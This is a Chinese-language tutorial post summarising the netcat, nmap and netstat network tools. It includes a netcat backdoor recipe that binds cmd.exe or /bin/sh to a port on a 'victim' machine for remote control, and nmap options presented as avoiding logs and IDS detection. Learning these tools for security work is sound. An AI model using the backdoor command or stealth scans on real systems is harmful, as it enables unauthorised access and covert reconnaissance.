netstat/nmap/netcat用法
這三款工具是網絡安全利器,做一個簡單摘要,以備參考。
netcat--網安瑞士軍刀
netcat可以用于監控/掃描網絡端口,它應用最多的情況是后門程序。
一般分兩個步驟:
步驟一: 我們在被攻擊的機器上用下列命令:nc –v –l –p 端口號 –e shell // 其中端口號是我們欲將shell綁定到哪個端口,shell在不同的系統是不同,在Windows下是cmd.exe,在Linux下一般是/bin/sh。
步驟二: 攻擊者在自己的機器上使用命令 :nc 被攻擊者IP 端口號來達到遠程控制受害者(被攻擊者)的機器。
? ? 下面的例子是將windows下的cmd.exe綁定在80端口,
? ?然后在Linux機器上進行控制
可以看到,我們在Linux下完全得到了Windows下一樣的cmd.exe,而且我們可以完全像在本地控制一樣遠程完全控制Windows。
?__________________________________________
nmap: 功能強大的端口掃描工具
?簡單來講,nmap有以下幾種主要用法
下面給出幾個例子,如默認掃描一臺主機的開放端口
C:\Users\aa>nmap 101.41.11.45Starting Nmap 5.51 ( http://nmap.org ) at 2012-03-23 14:13 中國標準時間
Nmap scan report for 101.41.11.45
Host is up (0.00061s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
139/tcp open netbios-ssn
443/tcp open https
912/tcp open apex-mesh
3306/tcp open mysql
3389/tcp open ms-term-serv
MAC Address: 00:11:D1:8A:67:16 (Micro-star International CO.)
Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds
端口有如下四種狀態:
Open port(防火墻允許少數端口打開)
Closed Port(由于防火墻的緣故,大部分的端口被關閉)
Filtered(Nmap不確定端口是否打開或者關閉)
Unfiltered(Nmap能夠訪問這個端口,但是不清楚這個端口打開的狀態)
如果用-A選項,會有更加詳細的信息,所有開放端口、對應的服務、操作系統信息會一覽無余。。。
C:\Users\aa>nmap -A 101.41.11.45Starting Nmap 5.51 ( http://nmap.org ) at 2012-03-23 14:16 中國標準時間
Nmap scan report for 101.41.11.45
Host is up (0.00011s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn
443/tcp open ssl/http Apache httpd
|_http-title: VisualSVN Server
|_http-favicon:
912/tcp open vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
3306/tcp open mysql MySQL 5.5.14
| mysql-info: Protocol: 10
| Version: 5.5.14
| Thread ID: 158
| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactio
ns, Secure Connection
| Status: Autocommit
|_Salt: w{'M-:xq
3389/tcp open ms-term-serv?
MAC Address: 00:11:D1:8A:67:16 (Micro-star International CO.)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP
Network Distance: 1 hop
Host script results:
|_nbstat: NetBIOS name: XXXXXXX, NetBIOS user: <unknown>, NetBIOS MAC: 0
0:13:d3:8a:67:16 (Micro-star International CO.)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Name: WORKGROUP\XXXXXXX
|_ System time: 2012-03-23 14:17:24 UTC+8
TRACEROUTE
HOP RTT ADDRESS
1 0.10 ms 101.41.11.45
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.66 seconds
掃描特定網段上的活動主機,這是nmap最強的地功能,提供了多種掃描方式
nmap -v -sn 192.168.1.1/24nmap 192.168.1.2 192.168.1.5 #掃描多個目標
nmap 192.168.1.1-100 #(掃描IP地址為192.168.1.1-192.168.1.100內 的所有主機)
nmap -iL target.txt #掃描這個target.txt內的所有主機
nmap 192.168.1.1/24 -exclude 192.168.1.1 #掃描除過某一個ip外的所有子網主機
nmap 192.168.1.1/24 -exclude file xxx.txt # xxx.txt中的文件將會從掃描的主機中排除
nmap -p80,21,23 192.168.1.1 # 掃描特定主機上的80,21,23端口
nmap -p 1-1000 192.168.0.1 #只掃描1~1000端口,可以節省時間
nmap -v -sn 192.168.0.0/16 10.0.0.0/8 # 不進行端口掃描
root@bt:~# nmap -v -sn 192.168.0.100/24 | grep -v down | grep 192 Nmap scan report for bogon (192.168.0.1) Nmap scan report for bogon (192.168.0.100) Nmap scan report for bogon (192.168.0.102) Nmap scan report for bogon (192.168.0.103)
?
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans, 參數較多,看實際需要進行選擇即可。
-sS被稱為半開放掃描,因為這種技術使得Nmap不需要通過完整的握手,就能獲得遠程主機的信息。Nmap發送SYN包到遠程主 機,但是它不會產生任何會話.因此不會在目標主機上產生任何日志記錄,因為沒有形成會話。
nmap -v -sS 192.168.1.1/24如果不選擇SYN掃描,TCP connect()掃描就是默認的掃描模式.不同于Tcp SYN掃描,Tcp connect()掃描需要完成三次握手,并且要求調用系統的connect().Tcp connect()掃描技術只適用于找出TCP和UDP端口.
Udp scan(sU)
顧名思義,這種掃描技術用來尋找目標主機打開的UDP端口.它不需要發送任何的SYN包,因為這種技術是針對UDP端口的。UDP掃描發送UDP數 據包到目標主機,并等待響應,如果返回ICMP不可達的錯誤消息,說明端口是關閉的,如果得到正確的適當的回應,說明端口是開放的.
FIN scan (sF)
有時候Tcp SYN掃描不是最佳的掃描模式,因為有防火墻的存在.目標主機有時候可能有IDS和IPS系統的存在,防火墻會阻止掉SYN數據包。發送一個設置了FIN標志的數據包并不需要完成TCP的握手
PING Scan (sP)
PING掃描不同于其它的掃描方式,因為它只用于找出主機是否是存在在網絡中的.它不是用來發現是否開放端口的.PING掃描需要ROOT權限,如果用戶沒有ROOT權限,PING掃描將會使用connect()調用.
nmap -sP 192.168.1.1nmap 其它常用參數
-iR <num hosts>: 隨機產生特定數量的ip-n:不進行域名解決,大批量掃描時可以省下不少時間-F: 快速掃描模式,只掃描常用的100個端口-sV:取得對應端口上程序的詳細版本信息-O: 進行操作系統判別-T:設置nmap的適時策略 Paranoid(最慢):為了避開IDS的檢測使掃描速度極慢,nmap串行所有的掃描,每隔至少5分鐘發送一個包;Sneaky:也差不多,只是數據包的發送間隔是15秒;Polite:不增加太大的網絡負載,避免宕掉目標主機,串行每個探測,并且使每個探測有0.4秒種的間隔;Normal:nmap默認的選項,在不是網絡過載或者主機/端口丟失的情況下盡可能快速地掃描;Aggressive:設置5分鐘的超時限制,使對每臺主機的掃描時間不超過5分鐘,并且使對每次探測回應的等待時間不超過1.5秒鐘;Insane(最瘋狂,最快):只適合快速的網絡或者你不在意丟失某些信息,每臺主機的超時限制是75秒,對每次探測只等待0.3秒鐘。一般使用數字來代替這些模式,例如:-T 0等于-T Paranoid,-T 5等于-T Insane。
? ___________________________________
netstat: 一般用于檢驗本機各端口的連接
如果說nmap/netcat都屬于“進攻”武器的話,netstat則是用于防守的利器。它可以顯示路由表、實際網絡連接以及每一個網絡接口設備的狀態信息。
例子詳見
http://www.cnblogs.com/vigarbuaa/archive/2012/03/07/2383064.html
http://www.cnblogs.com/vigarbuaa/archive/2012/03/23/2413178.html
?
?
?
?
?
?
總結
以上是生活随笔為你收集整理的netstat/nmap/netcat用法的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 移动互联网的下个十年猜想
- 下一篇: Exchange日常管理之二十一:管理邮